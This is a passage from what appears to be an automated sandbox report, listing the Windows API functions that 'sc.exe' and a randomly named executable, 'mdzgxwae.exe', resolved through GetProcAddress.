00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005780)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005912)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00006096)\n \"mdzgxwae.exe\" called \"GetProcAddress\" with a parameter GetTickCount 